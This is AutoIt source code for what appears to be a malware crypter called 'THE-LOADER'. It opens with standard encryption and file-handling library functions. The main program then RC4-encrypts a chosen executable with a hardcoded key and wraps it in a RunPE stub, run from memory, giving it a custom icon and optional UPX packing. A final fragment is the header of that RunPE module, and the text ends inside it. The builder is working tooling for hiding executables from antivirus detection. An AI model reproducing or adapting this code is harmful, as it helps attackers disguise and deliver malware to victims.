     $IERROR = 3
     ExitLoop 2
    EndIf
   EndIf
  Until False
Until True
_CRYPT_SHUTDOWN()
If $HFILE <> -1 Then FileClose($HFILE)
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_ENCRYPTFILE($SSOURCEFILE, $SDESTINATIONFILE, $VCRYPTKEY, $IALG_ID)
Local $HINFILE, $HOUTFILE
Local $IERROR = 0, $VRETURN = True
Local $BTEMPDATA
Local $IFILESIZE = FileGetSize($SSOURCEFILE)
Local $IREAD = 0
_CRYPT_STARTUP()
Do
  If $IALG_ID <> $CALG_USERKEY Then
   $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID)
   If @error Then
    $IERROR = 1
    $VRETURN = -1
    ExitLoop
   EndIf
  EndIf
  $HINFILE = FileOpen($SSOURCEFILE, 16)
  If @error Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  $HOUTFILE = FileOpen($SDESTINATIONFILE, 26)
  If @error Then
   $IERROR = 3
   $VRETURN = -1
   ExitLoop
  EndIf
  Do
   $BTEMPDATA = FileRead($HINFILE, 1024 * 1024)
   $IREAD += BinaryLen($BTEMPDATA)
   If $IREAD = $IFILESIZE Then
    $BTEMPDATA = _CRYPT_ENCRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, True)
    If @error Then
     $IERROR = 4
     $VRETURN = -1
    EndIf
    FileWrite($HOUTFILE, $BTEMPDATA)
    ExitLoop 2
   Else
    $BTEMPDATA = _CRYPT_ENCRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, False)
    If @error Then
     $IERROR = 5
     $VRETURN = -1
     ExitLoop 2
    EndIf
    FileWrite($HOUTFILE, $BTEMPDATA)
   EndIf
  Until False
Until True
If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY)
_CRYPT_SHUTDOWN()
If $HINFILE <> -1 Then FileClose($HINFILE)
If $HOUTFILE <> -1 Then FileClose($HOUTFILE)
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func _CRYPT_DECRYPTFILE($SSOURCEFILE, $SDESTINATIONFILE, $VCRYPTKEY, $IALG_ID)
Local $HINFILE, $HOUTFILE
Local $IERROR = 0, $VRETURN = True
Local $BTEMPDATA
Local $IFILESIZE = FileGetSize($SSOURCEFILE)
Local $IREAD = 0
_CRYPT_STARTUP()
Do
  If $IALG_ID <> $CALG_USERKEY Then
   $VCRYPTKEY = _CRYPT_DERIVEKEY($VCRYPTKEY, $IALG_ID)
   If @error Then
    $IERROR = 1
    $VRETURN = -1
    ExitLoop
   EndIf
  EndIf
  $HINFILE = FileOpen($SSOURCEFILE, 16)
  If @error Then
   $IERROR = 2
   $VRETURN = -1
   ExitLoop
  EndIf
  $HOUTFILE = FileOpen($SDESTINATIONFILE, 26)
  If @error Then
   $IERROR = 3
   $VRETURN = -1
   ExitLoop
  EndIf
  Do
   $BTEMPDATA = FileRead($HINFILE, 1024 * 1024)
   $IREAD += BinaryLen($BTEMPDATA)
   If $IREAD = $IFILESIZE Then
    $BTEMPDATA = _CRYPT_DECRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, True)
    If @error Then
     $IERROR = 4
     $VRETURN = -1
    EndIf
    FileWrite($HOUTFILE, $BTEMPDATA)
    ExitLoop 2
   Else
    $BTEMPDATA = _CRYPT_DECRYPTDATA($BTEMPDATA, $VCRYPTKEY, $CALG_USERKEY, False)
    If @error Then
     $IERROR = 5
     $VRETURN = -1
     ExitLoop 2
    EndIf
    FileWrite($HOUTFILE, $BTEMPDATA)
   EndIf
  Until False
Until True
If $IALG_ID <> $CALG_USERKEY Then _CRYPT_DESTROYKEY($VCRYPTKEY)
_CRYPT_SHUTDOWN()
If $HINFILE <> -1 Then FileClose($HINFILE)
If $HOUTFILE <> -1 Then FileClose($HOUTFILE)
Return SetError($IERROR, 0, $VRETURN)
EndFunc

Func __CRYPT_REFCOUNT()
Return $__G_ACRYPTINTERNALDATA[0]
EndFunc

Func __CRYPT_REFCOUNTINC()
$__G_ACRYPTINTERNALDATA[0] += 1
EndFunc

Func __CRYPT_REFCOUNTDEC()
If $__G_ACRYPTINTERNALDATA[0] > 0 Then $__G_ACRYPTINTERNALDATA[0] -= 1
EndFunc

Func __CRYPT_DLLHANDLE()
Return $__G_ACRYPTINTERNALDATA[1]
EndFunc

Func __CRYPT_DLLHANDLESET($HADVAPI32)
$__G_ACRYPTINTERNALDATA[1] = $HADVAPI32
EndFunc

Func __CRYPT_CONTEXT()
Return $__G_ACRYPTINTERNALDATA[2]
EndFunc

Func __CRYPT_CONTEXTSET($HCRYPTCONTEXT)
$__G_ACRYPTINTERNALDATA[2] = $HCRYPTCONTEXT
EndFunc
Global Const $FC_NOOVERWRITE = 0
Global Const $FC_OVERWRITE = 1
Global Const $FT_MODIFIED = 0
Global Const $FT_CREATED = 1
Global Const $FT_ACCESSED = 2
Global Const $FO_READ = 0
Global Const $FO_APPEND = 1
Global Const $FO_OVERWRITE = 2
Global Const $FO_BINARY = 16
Global Const $FO_UNICODE = 32
Global Const $FO_UTF16_LE = 32
Global Const $FO_UTF16_BE = 64
Global Const $FO_UTF8 = 128
Global Const $FO_UTF8_NOBOM = 256
Global Const $EOF = -1
Global Const $FD_FILEMUSTEXIST = 1
Global Const $FD_PATHMUSTEXIST = 2
Global Const $FD_MULTISELECT = 4
Global Const $FD_PROMPTCREATENEW = 8
Global Const $FD_PROMPTOVERWRITE = 16
Global Const $CREATE_NEW = 1
Global Const $CREATE_ALWAYS = 2
Global Const $OPEN_EXISTING = 3
Global Const $OPEN_ALWAYS = 4
Global Const $TRUNCATE_EXISTING = 5
Global Const $INVALID_SET_FILE_POINTER = -1
Global Const $FILE_BEGIN = 0
Global Const $FILE_CURRENT = 1
Global Const $FILE_END = 2
Global Const $FILE_ATTRIBUTE_READONLY = 1
Global Const $FILE_ATTRIBUTE_HIDDEN = 2
Global Const $FILE_ATTRIBUTE_SYSTEM = 4
Global Const $FILE_ATTRIBUTE_DIRECTORY = 16
Global Const $FILE_ATTRIBUTE_ARCHIVE = 32
Global Const $FILE_ATTRIBUTE_DEVICE = 64
Global Const $FILE_ATTRIBUTE_NORMAL = 128
Global Const $FILE_ATTRIBUTE_TEMPORARY = 256
Global Const $FILE_ATTRIBUTE_SPARSE_FILE = 512
Global Const $FILE_ATTRIBUTE_REPARSE_POINT = 1024
Global Const $FILE_ATTRIBUTE_COMPRESSED = 2048
Global Const $FILE_ATTRIBUTE_OFFLINE = 4096
Global Const $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192
Global Const $FILE_ATTRIBUTE_ENCRYPTED = 16384
Global Const $FILE_SHARE_READ = 1
Global Const $FILE_SHARE_WRITE = 2
Global Const $FILE_SHARE_DELETE = 4
Global Const $GENERIC_ALL = 268435456
Global Const $GENERIC_EXECUTE = 536870912
Global Const $GENERIC_WRITE = 1073741824
Global Const $GENERIC_READ = -2147483648
Func _FileCountLines($SFILEPATH)
Local $HFILE = FileOpen($SFILEPATH, $FO_READ)
If $HFILE = -1 Then Return SetError(1, 0, 0)
Local $SFILECONTENT = StringStripWS(FileRead($HFILE), 2)
FileClose($HFILE)
Local $ATMP
If StringInStr($SFILECONTENT, @LF) Then
  $ATMP = StringSplit(StringStripCR($SFILECONTENT), @LF)
ElseIf StringInStr($SFILECONTENT, @CR) Then
  $ATMP = StringSplit($SFILECONTENT, @CR)
Else
  If StringLen($SFILECONTENT) Then
   Return 1
  Else
   Return SetError(2, 0, 0)
  EndIf
EndIf
Return $ATMP[0]
EndFunc

Func _FileCreate($SFILEPATH)
Local $HOPENFILE = FileOpen($SFILEPATH, $FO_OVERWRITE)
If $HOPENFILE = -1 Then Return SetError(1, 0, 0)
Local $HWRITEFILE = FileWrite($HOPENFILE, "")
FileClose($HOPENFILE)
If $HWRITEFILE = -1 Then Return SetError(2, 0, 0)
Return 1
EndFunc

Func _FileListToArray($SPATH, $SFILTER = "*", $IFLAG = 0)
Local $HSEARCH, $SFILE, $SFILELIST, $SDELIM = "|"
$SPATH = StringRegExpReplace($SPATH, "[/]+z", "") & ""
If Not FileExists($SPATH) Then Return SetError(1, 1, "")
If StringRegExp($SFILTER, "[/:><|]|(?s)As*z") Then Return SetError(2, 2, "")
If Not ($IFLAG = 0 Or $IFLAG = 1 Or $IFLAG = 2) Then Return SetError(3, 3, "")
$HSEARCH = FileFindFirstFile($SPATH & $SFILTER)
If @error Then Return SetError(4, 4, "")
While 1
  $SFILE = FileFindNextFile($HSEARCH)
  If @error Then ExitLoop
  If ($IFLAG + @extended = 2) Then ContinueLoop
  $SFILELIST &= $SDELIM & $SFILE
WEnd
FileClose($HSEARCH)
If Not $SFILELIST Then Return SetError(4, 4, "")
Return StringSplit(StringTrimLeft($SFILELIST, 1), "|")
EndFunc

Func _FilePrint($S_FILE, $I_SHOW = @SW_HIDE)
Local $A_RET = DllCall("shell32.dll", "int", "ShellExecuteW", "hwnd", 0, "wstr", "print", "wstr", $S_FILE, "wstr", "", "wstr", "", "int", $I_SHOW)
If @error Then Return SetError(@error, @extended, 0)
If $A_RET[0] <= 32 Then Return SetError(10, $A_RET[0], 0)
Return 1
EndFunc

Func _FileReadToArray($SFILEPATH, ByRef $AARRAY)
Local $HFILE = FileOpen($SFILEPATH, $FO_READ)
If $HFILE = -1 Then Return SetError(1, 0, 0)
Local $AFILE = FileRead($HFILE, FileGetSize($SFILEPATH))
If StringRight($AFILE, 1) = @LF Then $AFILE = StringTrimRight($AFILE, 1)
If StringRight($AFILE, 1) = @CR Then $AFILE = StringTrimRight($AFILE, 1)
FileClose($HFILE)
If StringInStr($AFILE, @LF) Then
  $AARRAY = StringSplit(StringStripCR($AFILE), @LF)
ElseIf StringInStr($AFILE, @CR) Then
  $AARRAY = StringSplit($AFILE, @CR)
Else
  If StringLen($AFILE) Then
   Dim $AARRAY[2] = [1, $AFILE]
  Else
   Return SetError(2, 0, 0)
  EndIf
EndIf
Return 1
EndFunc

Func _FileWriteFromArray($FILE, $A_ARRAY, $I_BASE = 0, $I_UBOUND = 0)
If Not IsArray($A_ARRAY) Then Return SetError(2, 0, 0)
Local $LAST = UBound($A_ARRAY) - 1
If $I_UBOUND < 1 Or $I_UBOUND > $LAST Then $I_UBOUND = $LAST
If $I_BASE < 0 Or $I_BASE > $LAST Then $I_BASE = 0
Local $HFILE
If IsString($FILE) Then
  $HFILE = FileOpen($FILE, $FO_OVERWRITE)
Else
  $HFILE = $FILE
EndIf
If $HFILE = -1 Then Return SetError(1, 0, 0)
Local $ERRORSAV = 0
For $X = $I_BASE To $I_UBOUND
  If FileWrite($HFILE, $A_ARRAY[$X] & @CRLF) = 0 Then
   $ERRORSAV = 3
   ExitLoop
  EndIf
Next
If IsString($FILE) Then FileClose($HFILE)
If $ERRORSAV Then Return SetError($ERRORSAV, 0, 0)
Return 1
EndFunc

Func _FileWriteLog($SLOGPATH, $SLOGMSG, $IFLAG = -1)
Local $IOPENMODE = $FO_APPEND
Local $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY
Local $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC
Local $SMSG = $SDATENOW & " " & $STIMENOW & " : " & $SLOGMSG
If $IFLAG <> -1 Then
  $SMSG &= @CRLF & FileRead($SLOGPATH)
  $IOPENMODE = $FO_OVERWRITE
EndIf
Local $HOPENFILE = FileOpen($SLOGPATH, $IOPENMODE)
If $HOPENFILE = -1 Then Return SetError(1, 0, 0)
Local $IWRITEFILE = FileWriteLine($HOPENFILE, $SMSG)
Local $IRET = FileClose($HOPENFILE)
If $IWRITEFILE = -1 Then Return SetError(2, $IRET, 0)
Return $IRET
EndFunc

Func _FileWriteToLine($SFILE, $ILINE, $STEXT, $FOVERWRITE = 0)
If $ILINE <= 0 Then Return SetError(4, 0, 0)
If Not IsString($STEXT) Then
  $STEXT = String($STEXT)
  If $STEXT = "" Then Return SetError(6, 0, 0)
EndIf
If $FOVERWRITE <> 0 And $FOVERWRITE <> 1 Then Return SetError(5, 0, 0)
If Not FileExists($SFILE) Then Return SetError(2, 0, 0)
Local $SREAD_FILE = FileRead($SFILE)
Local $ASPLIT_FILE = StringSplit(StringStripCR($SREAD_FILE), @LF)
If UBound($ASPLIT_FILE) < $ILINE Then Return SetError(1, 0, 0)
Local $HFILE = FileOpen($SFILE, $FO_OVERWRITE)
If $HFILE = -1 Then Return SetError(3, 0, 0)
$SREAD_FILE = ""
For $I = 1 To $ASPLIT_FILE[0]
  If $I = $ILINE Then
   If $FOVERWRITE = 1 Then
    If $STEXT <> "" Then $SREAD_FILE &= $STEXT & @CRLF
   Else
    $SREAD_FILE &= $STEXT & @CRLF & $ASPLIT_FILE[$I] & @CRLF
   EndIf
  ElseIf $I < $ASPLIT_FILE[0] Then
   $SREAD_FILE &= $ASPLIT_FILE[$I] & @CRLF
  ElseIf $I = $ASPLIT_FILE[0] Then
   $SREAD_FILE &= $ASPLIT_FILE[$I]
  EndIf
Next
FileWrite($HFILE, $SREAD_FILE)
FileClose($HFILE)
Return 1
EndFunc

Func _PathFull($SRELATIVEPATH, $SBASEPATH = @WorkingDir)
If Not $SRELATIVEPATH Or $SRELATIVEPATH = "." Then Return $SBASEPATH
Local $SFULLPATH = StringReplace($SRELATIVEPATH, "/", "")
Local Const $SFULLPATHCONST = $SFULLPATH
Local $SPATH
Local $BROOTONLY = StringLeft($SFULLPATH, 1) = "" And StringMid($SFULLPATH, 2, 1) <> ""
For $I = 1 To 2
  $SPATH = StringLeft($SFULLPATH, 2)
  If $SPATH = "" Then
   $SFULLPATH = StringTrimLeft($SFULLPATH, 2)
   Local $NSERVERLEN = StringInStr($SFULLPATH, "") - 1
   $SPATH = "" & StringLeft($SFULLPATH, $NSERVERLEN)
   $SFULLPATH = StringTrimLeft($SFULLPATH, $NSERVERLEN)
   ExitLoop
  ElseIf StringRight($SPATH, 1) = ":" Then
   $SFULLPATH = StringTrimLeft($SFULLPATH, 2)
   ExitLoop
  Else
   $SFULLPATH = $SBASEPATH & "" & $SFULLPATH
  EndIf
Next
If $I = 3 Then Return ""
If StringLeft($SFULLPATH, 1) <> "" Then
  If StringLeft($SFULLPATHCONST, 2) = StringLeft($SBASEPATH, 2) Then
   $SFULLPATH = $SBASEPATH & "" & $SFULLPATH
  Else
   $SFULLPATH = "" & $SFULLPATH
  EndIf
EndIf
Local $ATEMP = StringSplit($SFULLPATH, "")
Local $APATHPARTS[$ATEMP[0]], $J = 0
For $I = 2 To $ATEMP[0]
  If $ATEMP[$I] = ".." Then
   If $J Then $J -= 1
  ElseIf Not ($ATEMP[$I] = "" And $I <> $ATEMP[0]) And $ATEMP[$I] <> "." Then
   $APATHPARTS[$J] = $ATEMP[$I]
   $J += 1
  EndIf
Next
$SFULLPATH = $SPATH
If Not $BROOTONLY Then
  For $I = 0 To $J - 1
   $SFULLPATH &= "" & $APATHPARTS[$I]
  Next
Else
  $SFULLPATH &= $SFULLPATHCONST
  If StringInStr($SFULLPATH, "..") Then $SFULLPATH = _PathFull($SFULLPATH)
EndIf
While StringInStr($SFULLPATH, ".")
  $SFULLPATH = StringReplace($SFULLPATH, ".", "")
WEnd
Return $SFULLPATH
EndFunc

Func _PATHGETRELATIVE($SFROM, $STO)
If StringRight($SFROM, 1) <> "" Then $SFROM &= ""
If StringRight($STO, 1) <> "" Then $STO &= ""
If $SFROM = $STO Then Return SetError(1, 0, StringTrimRight($STO, 1))
Local $ASFROM = StringSplit($SFROM, "")
Local $ASTO = StringSplit($STO, "")
If $ASFROM[1] <> $ASTO[1] Then Return SetError(2, 0, StringTrimRight($STO, 1))
Local $I = 2
Local $IDIFF = 1
While 1
  If $ASFROM[$I] <> $ASTO[$I] Then
   $IDIFF = $I
   ExitLoop
  EndIf
  $I += 1
WEnd
$I = 1
Local $SRELPATH = ""
For $J = 1 To $ASTO[0]
  If $I >= $IDIFF Then
   $SRELPATH &= "" & $ASTO[$I]
  EndIf
  $I += 1
Next
$SRELPATH = StringTrimLeft($SRELPATH, 1)
$I = 1
For $J = 1 To $ASFROM[0]
  If $I > $IDIFF Then
   $SRELPATH = ".." & $SRELPATH
  EndIf
  $I += 1
Next
If StringRight($SRELPATH, 1) == "" Then $SRELPATH = StringTrimRight($SRELPATH, 1)
Return $SRELPATH
EndFunc

Func _PathMake($SZDRIVE, $SZDIR, $SZFNAME, $SZEXT)
If StringLen($SZDRIVE) Then
  If Not (StringLeft($SZDRIVE, 2) = "") Then $SZDRIVE = StringLeft($SZDRIVE, 1) & ":"
EndIf
If StringLen($SZDIR) Then
  If Not (StringRight($SZDIR, 1) = "") And Not (StringRight($SZDIR, 1) = "/") Then $SZDIR = $SZDIR & ""
EndIf
If StringLen($SZEXT) Then
  If Not (StringLeft($SZEXT, 1) = ".") Then $SZEXT = "." & $SZEXT
EndIf
Return $SZDRIVE & $SZDIR & $SZFNAME & $SZEXT
EndFunc

Func _PathSplit($SZPATH, ByRef $SZDRIVE, ByRef $SZDIR, ByRef $SZFNAME, ByRef $SZEXT)
Local $DRIVE = ""
Local $DIR = ""
Local $FNAME = ""
Local $EXT = ""
Local $POS
Local $ARRAY[5]
$ARRAY[0] = $SZPATH
If StringMid($SZPATH, 2, 1) = ":" Then
  $DRIVE = StringLeft($SZPATH, 2)
  $SZPATH = StringTrimLeft($SZPATH, 2)
ElseIf StringLeft($SZPATH, 2) = "" Then
  $SZPATH = StringTrimLeft($SZPATH, 2)
  $POS = StringInStr($SZPATH, "")
  If $POS = 0 Then $POS = StringInStr($SZPATH, "/")
  If $POS = 0 Then
   $DRIVE = "" & $SZPATH
   $SZPATH = ""
  Else
   $DRIVE = "" & StringLeft($SZPATH, $POS - 1)
   $SZPATH = StringTrimLeft($SZPATH, $POS - 1)
  EndIf
EndIf
Local $NPOSFORWARD = StringInStr($SZPATH, "/", 0, -1)
Local $NPOSBACKWARD = StringInStr($SZPATH, "", 0, -1)
If $NPOSFORWARD >= $NPOSBACKWARD Then
  $POS = $NPOSFORWARD
Else
  $POS = $NPOSBACKWARD
EndIf
$DIR = StringLeft($SZPATH, $POS)
$FNAME = StringRight($SZPATH, StringLen($SZPATH) - $POS)
If StringLen($DIR) = 0 Then $FNAME = $SZPATH
$POS = StringInStr($FNAME, ".", 0, -1)
If $POS Then
  $EXT = StringRight($FNAME, StringLen($FNAME) - ($POS - 1))
  $FNAME = StringLeft($FNAME, $POS - 1)
EndIf
$SZDRIVE = $DRIVE
$SZDIR = $DIR
$SZFNAME = $FNAME
$SZEXT = $EXT
$ARRAY[1] = $DRIVE
$ARRAY[2] = $DIR
$ARRAY[3] = $FNAME
$ARRAY[4] = $EXT
Return $ARRAY
EndFunc

Func _ReplaceStringInFile($SZFILENAME, $SZSEARCHSTRING, $SZREPLACESTRING, $FCASENESS = 0, $FOCCURANCE = 1)
Local $IRETVAL = 0
Local $NCOUNT, $SENDSWITH
If StringInStr(FileGetAttrib($SZFILENAME), "R") Then Return SetError(6, 0, -1)
Local $HFILE = FileOpen($SZFILENAME, $FO_READ)
If $HFILE = -1 Then Return SetError(1, 0, -1)
Local $S_TOTFILE = FileRead($HFILE, FileGetSize($SZFILENAME))
If StringRight($S_TOTFILE, 2) = @CRLF Then
  $SENDSWITH = @CRLF
ElseIf StringRight($S_TOTFILE, 1) = @CR Then
  $SENDSWITH = @CR
ElseIf StringRight($S_TOTFILE, 1) = @LF Then
  $SENDSWITH = @LF
Else
  $SENDSWITH = ""
EndIf
Local $AFILELINES = StringSplit(StringStripCR($S_TOTFILE), @LF)
FileClose($HFILE)
Local $HWRITEHANDLE = FileOpen($SZFILENAME, $FO_OVERWRITE)
If $HWRITEHANDLE = -1 Then Return SetError(2, 0, -1)
For $NCOUNT = 1 To $AFILELINES[0]
  If StringInStr($AFILELINES[$NCOUNT], $SZSEARCHSTRING, $FCASENESS) Then
   $AFILELINES[$NCOUNT] = StringReplace($AFILELINES[$NCOUNT], $SZSEARCHSTRING, $SZREPLACESTRING, 1 - $FOCCURANCE, $FCASENESS)
   $IRETVAL = $IRETVAL + 1
   If $FOCCURANCE = 0 Then
    $IRETVAL = 1
    ExitLoop
   EndIf
  EndIf
Next
For $NCOUNT = 1 To $AFILELINES[0] - 1
  If FileWriteLine($HWRITEHANDLE, $AFILELINES[$NCOUNT]) = 0 Then
   FileClose($HWRITEHANDLE)
   Return SetError(3, 0, -1)
  EndIf
Next
If $AFILELINES[$NCOUNT] <> "" Then FileWrite($HWRITEHANDLE, $AFILELINES[$NCOUNT] & $SENDSWITH)
FileClose($HWRITEHANDLE)
Return $IRETVAL
EndFunc

Func _TempFile($S_DIRECTORYNAME = @TempDir, $S_FILEPREFIX = "~", $S_FILEEXTENSION = ".tmp", $I_RANDOMLENGTH = 7)
If Not FileExists($S_DIRECTORYNAME) Then $S_DIRECTORYNAME = @TempDir
If Not FileExists($S_DIRECTORYNAME) Then $S_DIRECTORYNAME = @ScriptDir
If StringRight($S_DIRECTORYNAME, 1) <> "" Then $S_DIRECTORYNAME = $S_DIRECTORYNAME & ""
Local $S_TEMPNAME
Do
  $S_TEMPNAME = ""
  While StringLen($S_TEMPNAME) < $I_RANDOMLENGTH
   $S_TEMPNAME = $S_TEMPNAME & Chr(Random(97, 122, 1))
  WEnd
  $S_TEMPNAME = $S_DIRECTORYNAME & $S_FILEPREFIX & $S_TEMPNAME & $S_FILEEXTENSION
Until Not FileExists($S_TEMPNAME)
Return $S_TEMPNAME
EndFunc
#NoTrayIcon
Opt("GUIONEVENTMODE", 1)
Opt("MUSTDECLAREVARS", 1)
Local $MAINFORM, $FILE_BINARY_TEXT, $BINARY_INPUT, $BINARY_BUTTON, $COMPILE_BUTTON, $ICON_BUTTON, $ICON_INPUT, $COMPRESS_CHECKBOX, $EXE_BUTTON, $EXE_INPUT
Local $OPEN_EXE, $PATH_ICO, $SAVE_EXE, $HASH
$MAINFORM = GUICreate(".:: THE-LOADER ::. ( *.exe ) - for windows plattes formes", 550, 430)
$HASH = _CRYPT_HASHFILE(@ScriptDir & "Banner.jpg", $CALG_MD5)
If $HASH = "0XFF6A838E9AA2C9890091C1A9FF983F8F" Then
GUICtrlCreatePic(@ScriptDir & "Banner.jpg", 0, 0, 550, 217)
Else
GUICtrlCreateLabel("Image is modifed ( not allow bأ©cause author right ) or not found !" & @CRLF & "Author : Pirate-inc (c)" & @CRLF & "Email : mi-dou93@hotmail.com ( facebook )", 95, 120, 370)
GUICtrlSetColor(-1, 16711680)
GUICtrlSetFont(-1, 8.5, 800, -1, "TAHOMA")
EndIf
GUICtrlCreateGroup("Inpute pannel", 5, 225, 540, 160)
$FILE_BINARY_TEXT = GUICtrlCreateLabel("Chosse a pe-files and an icon and save path then 'compile' :", 10, 250)
$BINARY_BUTTON = GUICtrlCreateButton("File", 470, 270, 70, 25)
$BINARY_INPUT = GUICtrlCreateInput("", 10, 273, 450, 20)
GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW")
$ICON_BUTTON = GUICtrlCreateButton("Icon", 470, 300, 70, 25)
$ICON_INPUT = GUICtrlCreateInput("", 10, 303, 450, 20)
GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW")
$COMPRESS_CHECKBOX = GUICtrlCreateCheckbox("Compress result file ( upx packer final )", 10, 360)
$EXE_BUTTON = GUICtrlCreateButton("Save as", 470, 330, 70, 25)
$EXE_INPUT = GUICtrlCreateInput("", 10, 333, 450, 20)
GUICtrlSetFont(-1, 8.5, 400, -1, "COURIER NEW")
$COMPILE_BUTTON = GUICtrlCreateButton("Builde script", 440, 395, 100, 30)
GUISetOnEvent($GUI_EVENT_CLOSE, "__EXIT")
GUICtrlSetOnEvent($BINARY_BUTTON, "__BROWSE")
GUICtrlSetOnEvent($ICON_BUTTON, "__BROWSE")
GUICtrlSetOnEvent($EXE_BUTTON, "__BROWSE")
GUICtrlSetOnEvent($COMPILE_BUTTON, "__COMPILE")
GUISetState()
Func __EXIT()
Select
  Case @GUI_WinHandle = $MAINFORM
   GUIDelete(@GUI_WinHandle)
   Exit
  Case @GUI_WinHandle <> $MAINFORM
   GUIDelete(@GUI_WinHandle)
EndSelect
EndFunc

Func __COMPILE()
Local Const $AUTOIT3_EXE_PATH = RegRead("HKEY_LOCAL_MACHINESOFTWAREAUTOIT V3AUTOIT", "INSTALLDIR") & "AUT2EXEAUT2EXE.EXE"
Local Const $TEMP_RUNPE = @TempDir & "__RUNPE.BIN", $TEMP_PECODE = @TempDir & "__PE-SCRYPTED.BIN", $QUOT = BinaryToString("0X22")
Local $PE_DATA, $PE_HEANDEL_FILE, $AU3_HEANDEL_FILE, $CMD
FileInstall("__RUNPE.AU3", $TEMP_RUNPE)
If $OPEN_EXE <> "" And $SAVE_EXE <> "" And $PATH_ICO <> "" And $AUTOIT3_EXE_PATH <> "" Then
  $PE_HEANDEL_FILE = FileOpen($OPEN_EXE, 16)
  $PE_DATA = FileRead($PE_HEANDEL_FILE)
  $PE_DATA = _CRYPT_ENCRYPTDATA($PE_DATA, "DEV-POINT.COM", $CALG_RC4)
  FileWrite($TEMP_PECODE, $PE_DATA)
  $CMD = "/IN " & $QUOT & $TEMP_RUNPE & $QUOT & " " & "/OUT " & $QUOT & $SAVE_EXE & $QUOT & " "
  $CMD &= "/ICON " & $QUOT & $PATH_ICO & $QUOT & " "
  $CMD &= "/COMP 4" & " "
  If GUICtrlRead($COMPRESS_CHECKBOX) = $GUI_CHECKED Then
   $CMD &= "/PACK" & " "
  Else
   $CMD &= "/NOPACK" & " "
  EndIf
  ShellExecuteWait($AUTOIT3_EXE_PATH, $CMD)
  FileClose($PE_HEANDEL_FILE)
  FileDelete($TEMP_PECODE)
EndIf
FileDelete($TEMP_RUNPE)
EndFunc

Func __BROWSE()
Local $TITLE, $FILTER
Select
  Case @GUI_CtrlId = $BINARY_BUTTON
   $TITLE = "Select a pe-code file"
   $FILTER = "PE-code files (*.exe)"
   $OPEN_EXE = FileOpenDialog($TITLE, "", $FILTER, 3, "", $MAINFORM)
   GUICtrlSetData($BINARY_INPUT, $OPEN_EXE)
  Case @GUI_CtrlId = $ICON_BUTTON
   $TITLE = "Select an icon files"
   $FILTER = "Icons files (*.ico)"
   $PATH_ICO = FileOpenDialog($TITLE, "", $FILTER, 3, "", $MAINFORM)
   GUICtrlSetData($ICON_INPUT, $PATH_ICO)
  Case @GUI_CtrlId = $EXE_BUTTON
   $TITLE = "Save new pe-code file as ..."
   $FILTER = "PE-code files (*.exe)"
   $SAVE_EXE = FileSaveDialog($TITLE, "", $FILTER, 3, "", $MAINFORM)
   GUICtrlSetData($EXE_INPUT, $SAVE_EXE)
EndSelect
EndFunc
While 1
Sleep(1000)
WEnd

2-

#INCLUDE-ONCE
#INCLUDE <CRYPT.AU3>
#CS =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    TITLE .........: __RUNPE
    AUTOIT VERSION.: 3.2.12++
    LANGUAGE.......: ENGLISH
    DESCRIPTION ...: RUN BINARY EXECUTING FROM MEMORY
    =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    =-=--=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    NAME ..........: __RUNPE
    DESCRIPTION ...: RUN BINARY EXECUTING FROM MEMORY
    SYNTAX ........: _RUNBINARY( $BBINARYIMAGE [, $SCOMMANDLINE [, $SEXEMODULE ]] )
PARAMETERS ....:
    - $BBINARYIMAGE     - A BINARY VALUE.
- $SCOMMANDLINE     - [OPTIONAL] A STRING VALUE.
- $SEXEMODULE         - [OPTIONAL] A STRING VALUE.
    RETURN VALUES .: NONE
AUTHOR(S) .....: TRANCEXX -> _RUNEXEFROMMEMORY ( RESCRYPTED BY : HOUDINI DEV-POINT.COM , EMAIL : MI-DOU93@HOTMAIL.COM)
MODIFIED ......: JOمO CARLOS (JSCRIPT FROM BRAZIL)
    REMARKS .......: WHEN IT WILL FAIL?
- IT APPEARS THAT VISTA IS DOING SOME SORT OF REBASING WHEN LOADING AN EXE. I HAVE NO IDEA WHEN THAT HAPPENS
- BUT SURE IS SMART THING TO DO IF HIGHER LEVEL OF SECURITY IS WANTED. THIS MEANS THAT EXE IS NOT PUT TO BASE
- ADDRESS (HARD CODED INSIDE EVERY EXE) BUT IS MOVED AWAY FROM THAT POINT. I'VE MADE A COMMENT IN THE CODE
- WHERE THAT MATTERS. THIS MEANS THE FUNCTION WILL FAIL FOR VISTA.
- GENERAL FAILURE WILL BE IF THE SIZE OF THE NEW EXE IS BIGGER THAN AUTOIT'S SIZE. THAT WOULD REQUIRE ALLOCATING
- MORE MEMORY TO WORK (I'M NOT DOING THAT).
- THERE IS ONE MORE SCENARIO OF FAILURE. SOMETIMES COMPILERS COMPILE WRONG (YES IT HAPPENS) AND THEN READ DATA
- WILL BE WRONG. WINDOWS IS LIKELY USING SOME METHODS TO VERIFY CRUCIAL PARTS OF THE PE FILE - THERE IS BACKUP
- SCENARIO IN CASE OF SOME ERRORS. CODE I'M POSTING USES ONLY READ DATA, THERE IS NO VERIFYING DONE.
    - IF DATA IS WRONG - FUNCTION FAILS.
    RELATED .......:
